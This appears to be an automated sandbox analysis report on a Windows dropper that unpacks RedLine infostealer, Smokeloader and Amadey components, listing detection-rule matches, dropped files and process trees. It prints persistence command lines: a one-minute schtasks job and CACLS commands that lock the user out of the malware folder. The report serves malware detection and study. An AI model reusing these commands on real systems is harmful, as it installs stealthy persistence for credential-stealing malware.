                              Source: 2.2.arJf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                              Source: 2.2.arJf.exe.580e67.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                              Source: 2.3.arJf.exe.5b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                              Source: 2.2.arJf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                              Source: 00000002.00000002.360346336.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                              Source: 00000002.00000002.363155584.0000000000667000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                              Source: 00000002.00000002.362707528.0000000000580000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                              Source: 00000002.00000003.336400821.00000000005B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A33BA20_2_00A33BA2
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A35C9E0_2_00A35C9E
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\brJg.exeCode function: 1_2_00F83BA21_2_00F83BA2
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\brJg.exeCode function: 1_2_00F85C9E1_2_00F85C9E
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeCode function: 2_2_00408C602_2_00408C60
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeCode function: 2_2_0040DC112_2_0040DC11
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeCode function: 2_2_00407C3F2_2_00407C3F
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeCode function: 2_2_00418CCC2_2_00418CCC
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeCode function: 2_2_00406CA02_2_00406CA0
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeCode function: 2_2_004028B02_2_004028B0
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeCode function: 2_2_0041A4BE2_2_0041A4BE
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeCode function: 2_2_004182442_2_00418244
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeCode function: 2_2_004016502_2_00401650
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeCode function: 2_2_00402F202_2_00402F20
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeCode function: 2_2_004193C42_2_004193C4
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeCode function: 2_2_004187882_2_00418788
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeCode function: 2_2_00402F892_2_00402F89
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeCode function: 2_2_00402B902_2_00402B90
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeCode function: 2_2_004073A02_2_004073A0
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeCode function: 2_2_02020DA72_2_02020DA7
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeCode function: 2_2_02020DB02_2_02020DB0
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 14_2_010C853014_2_010C8530
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 14_2_010C754D14_2_010C754D
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 14_2_010A646014_2_010A6460
                              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\clip64[1].dll B5BD049D32F0FAEEA6CE65A0F0D326DE5BC4427A7C1AD24BFB0EA050C1DEC7D3
                              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                              Source: 2.2.arJf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                              Source: 2.2.arJf.exe.580e67.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                              Source: 2.3.arJf.exe.5b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                              Source: 2.2.arJf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                              Source: 00000002.00000002.360346336.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                              Source: 00000002.00000002.363155584.0000000000667000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                              Source: 00000002.00000002.362707528.0000000000580000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                              Source: 00000002.00000003.336400821.00000000005B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A31F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,0_2_00A31F90
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\brJg.exeCode function: 1_2_00F81F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,1_2_00F81F90
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: String function: 010B7CE0 appears 35 times
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: String function: 010B5E20 appears 130 times
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeCode function: String function: 0040E1D8 appears 44 times
                              Source: file.exeStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 431118 bytes, 2 files, at 0x2c +A "brJg.exe" +A "xriv.exe", ID 1582, number 1, 20 datablocks, 0x1503 compression
                              Source: brJg.exe.0.drStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 239238 bytes, 2 files, at 0x2c +A "arJf.exe" +A "nika.exe", ID 1542, number 1, 12 datablocks, 0x1503 compression
                              Source: file.exe, 00000000.00000003.249730772.00000000049A9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs file.exe
                              Source: file.exeBinary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs file.exe
                              Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\arJf.exe.log
                              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@37/14@0/1
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe File read: C:\Users\user\Desktop\desktop.ini
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A33FEF CreateProcessA,WaitForSingleObject,GetExitCodeProcess,CloseHandle,CloseHandle,GetLastError,FormatMessageA,0_2_00A33FEF
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeCode function: 2_2_0202A1A8 ChangeServiceConfigA,2_2_0202A1A8
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A34FE0 FindResourceA,LoadResource,LockResource,GetDlgItem,ShowWindow,GetDlgItem,ShowWindow,FreeResource,SendMessageA,0_2_00A34FE0
                              Source: file.exeReversingLabs: Detection: 69%
                              Source: file.exeVirustotal: Detection: 51%
                              Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                              Source: unknownProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
                              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\brJg.exe C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\brJg.exe
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\brJg.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exe C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\arJf.exe
                              Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\
                              Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\brJg.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\nika.exe
                              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\xriv.exe
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeProcess created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe "C:\Users\user~1\AppData\Local\Temp\4b9a106e76\mnolyk.exe"
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\user~1\AppData\Local\Temp\4b9a106e76\mnolyk.exe" /F
                              Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "mnolyk.exe" /P "user:N"&&CACLS "mnolyk.exe" /P "user:R" /E&&echo Y|CACLS "..\4b9a106e76" /P "user:N"&&CACLS "..\4b9a106e76" /P "user:R" /E&&Exit
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "mnolyk.exe" /P "user:N"
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "mnolyk.exe" /P "user:R" /E
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "..\4b9a106e76" /P "user:N"
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "..\4b9a106e76" /P "user:R" /E
                              Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe C:\Users\user~1\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
                              Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A3597D GetCurrentDirectoryA,SetCurrentDirectoryA,GetDiskFreeSpaceA,MulDiv,GetVolumeInformationA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,0_2_00A3597D
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeCode function: 2_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,2_2_004019F0
                              Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6068:120:WilError_01
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1340:120:WilError_01
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeMutant created: \Sessions\1\BaseNamedObjects\c1ec479e5342a25940592acf24703eb2
                              Source: C:\Users\user\Desktop\file.exeCommand line argument: Kernel32.dll0_2_00A32BFB
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\brJg.exeCommand line argument: Kernel32.dll1_2_00F82BFB
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeCommand line argument: 08A2_2_00413780
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                              Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                              Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                              Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                              Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                              Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                              Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                              Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                              Source: Binary string: wextract.pdb source: file.exe, brJg.exe.0.dr
                              Source: Binary string: D:\Mktmp\Amadey\Release\Amadey.pdb source: file.exe, 00000000.00000003.249730772.00000000049A9000.00000004.00000020.00020000.00000000.sdmp, xriv.exe, 0000000E.00000002.395940518.00000000010CE000.00000002.00000001.01000000.0000000A.sdmp, xriv.exe, 0000000E.00000000.394369817.00000000010CE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 0000000F.00000000.395468637.000000000009E000.00000002.00000001.01000000.0000000B.sdmp, mnolyk.exe, 0000000F.00000002.775153494.000000000009E000.00000002.00000001.01000000.0000000B.sdmp, mnolyk.exe, 0000001A.00000002.404223477.000000000009E000.00000002.00000001.01000000.0000000B.sdmp, mnolyk.exe, 0000001A.00000000.402551757.000000000009E000.00000002.00000001.01000000.0000000B.sdmp, mnolyk.exe, 0000001C.00000002.412679871.000000000009E000.00000002.00000001.01000000.0000000B.sdmp, mnolyk.exe, 0000001C.00000000.412460311.000000000009E000.00000002.00000001.01000000.0000000B.sdmp, mnolyk.exe, 0000001F.00000002.539131975.000000000009E000.00000002.00000001.01000000.0000000B.sdmp, mnolyk.exe, 0000001F.00000000.538897999.000000000009E000.00000002.00000001.01000000.0000000B.sdmp, mnolyk.exe, 00000021.00000002.667838204.000000000009E000.00000002.00000001.01000000.0000000B.sdmp, mnolyk.exe, 00000021.00000000.667524301.000000000009E000.00000002.00000001.01000000.0000000B.sdmp, mnolyk.exe.14.dr, xriv.exe.0.dr
                              Source: Binary string: Healer.pdb source: arJf.exe, 00000002.00000002.368629241.00000000021E0000.00000004.00000020.00020000.00000000.sdmp, arJf.exe, 00000002.00000002.368573953.0000000002180000.00000004.08000000.00040000.00000000.sdmp, arJf.exe, 00000002.00000002.368210560.0000000002000000.00000004.08000000.00040000.00000000.sdmp, arJf.exe, 00000002.00000002.368703907.0000000002631000.00000004.00000800.00020000.00000000.sdmp
                              Source: Binary string: wextract.pdbGCTL source: file.exe, brJg.exe.0.dr
                              Source: Binary string: C:\Users\Admin\source\repos\Healer\Healer\obj\Release\Healer.pdb source: brJg.exe, 00000001.00000003.252066347.00000000033E5000.00000004.00000020.00020000.00000000.sdmp, brJg.exe, 00000001.00000003.251774112.0000000004E86000.00000004.00000020.00020000.00000000.sdmp, nika.exe, 0000000D.00000000.369407465.0000000000142000.00000002.00000001.01000000.00000009.sdmp, nika.exe.1.dr
                              Source: Binary string: _.pdb source: arJf.exe, 00000002.00000002.368629241.00000000021E0000.00000004.00000020.00020000.00000000.sdmp, arJf.exe, 00000002.00000002.368210560.0000000002000000.00000004.08000000.00040000.00000000.sdmp, arJf.exe, 00000002.00000002.368703907.0000000002631000.00000004.00000800.00020000.00000000.sdmp
                              Source: Binary string: KC:\jovoxomexep_yuyobib\topaduseyese.pdb source: arJf.exe, 00000002.00000000.252149587.0000000000401000.00000020.00000001.01000000.00000005.sdmp, arJf.exe.1.dr
                              Source: Binary string: D:\Mktmp\Amadey\ClipperDLL\Release\CLIPPERDLL.pdb source: mnolyk.exe, 0000000F.00000002.775467476.0000000001189000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001B.00000002.775394755.000000006FB9F000.00000002.00000001.01000000.0000000D.sdmp, clip64[1].dll.15.dr, clip64.dll.15.dr
                              Source: Binary string: Healer.pdbH5 source: arJf.exe, 00000002.00000002.368629241.00000000021E0000.00000004.00000020.00020000.00000000.sdmp, arJf.exe, 00000002.00000002.368573953.0000000002180000.00000004.08000000.00040000.00000000.sdmp, arJf.exe, 00000002.00000002.368210560.0000000002000000.00000004.08000000.00040000.00000000.sdmp, arJf.exe, 00000002.00000002.368703907.0000000002631000.00000004.00000800.00020000.00000000.sdmp
                              Source: Binary string: *C:\jovoxomexep_yuyobib\topaduseyese.pdb source: brJg.exe, 00000001.00000003.251774112.0000000004E51000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: C:\jovoxomexep_yuyobib\topaduseyese.pdb source: brJg.exe, 00000001.00000003.251774112.0000000004E51000.00000004.00000020.00020000.00000000.sdmp, arJf.exe, 00000002.00000000.252149587.0000000000401000.00000020.00000001.01000000.00000005.sdmp, arJf.exe.1.dr

                              Data Obfuscation

                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeUnpacked PE file: 2.2.arJf.exe.400000.0.unpack
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeUnpacked PE file: 2.2.arJf.exe.400000.0.unpack .text:ER;.data:W;.baveke:R;.hewi:R;.zax:R;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A3724D push ecx; ret 0_2_00A37260
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\brJg.exeCode function: 1_2_00F8724D push ecx; ret 1_2_00F87260
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeCode function: 2_2_0041C40C push cs; iretd 2_2_0041C4E2
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeCode function: 2_2_00423149 push eax; ret 2_2_00423179
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeCode function: 2_2_0041C50E push cs; iretd 2_2_0041C4E2
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeCode function: 2_2_004231C8 push eax; ret 2_2_00423179
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeCode function: 2_2_0040E21D push ecx; ret 2_2_0040E230
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeCode function: 2_2_0041C6BE push ebx; ret 2_2_0041C6BF
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeCode function: 2_2_020248B5 push ss; retf 2_2_020248B7
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeCode function: 2_2_02024139 push edi; iretd 2_2_0202414E
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeCode function: 2_2_0202454E push ecx; retf 2_2_02024554
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A3202A memset,memset,RegCreateKeyExA,RegQueryValueExA,RegCloseKey,GetSystemDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,GetSystemDirectoryA,GetModuleFileNameA,LocalAlloc,RegCloseKey,RegSetValueExA,RegCloseKey,LocalFree,0_2_00A3202A
                              Source: nika.exe.1.drStatic PE information: 0xE382D401 [Fri Dec 15 06:19:45 2090 UTC]
                              Source: arJf.exe.1.drStatic PE information: section name: .baveke
                              Source: arJf.exe.1.drStatic PE information: section name: .hewi
                              Source: arJf.exe.1.drStatic PE information: section name: .zax

                              Persistence and Installation Behavior

                              Source: Yara matchFile source: dump.pcap, type: PCAP
                              Source: Yara matchFile source: 0000000F.00000002.775467476.0000000001139000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000F.00000002.775467476.0000000001189000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: mnolyk.exe PID: 2728, type: MEMORYSTR
                              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeJump to dropped file
                              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\brJg.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\clip64[1].dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\brJg.exeFile created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeFile created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeFile created: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\brJg.exeFile created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeJump to dropped file
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A31AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,0_2_00A31AE8
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\brJg.exeCode function: 1_2_00F81AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,1_2_00F81AE8

                              Boot Survival

                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\user~1\AppData\Local\Temp\4b9a106e76\mnolyk.exe" /F
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "mnolyk.exe" /P "user:N"
                              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\brJg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\arJf.exe TID: 3960Thread sleep time: -922337203685477s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe TID: 1552Thread sleep time: -922337203685477s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe TID: 5156Thread sleep count: 77 > 30Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe TID: 5156Thread sleep time: -2310000s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe TID: 4056Thread sleep time: -50000s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe TID: 4196Thread sleep count: 41 > 30Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe TID: 2856Thread sleep count: 45 > 30Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe TID: 2856Thread sleep time: -8100000s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe TID: 5156Thread sleep time: -30000s >= -30000sJump to behavior
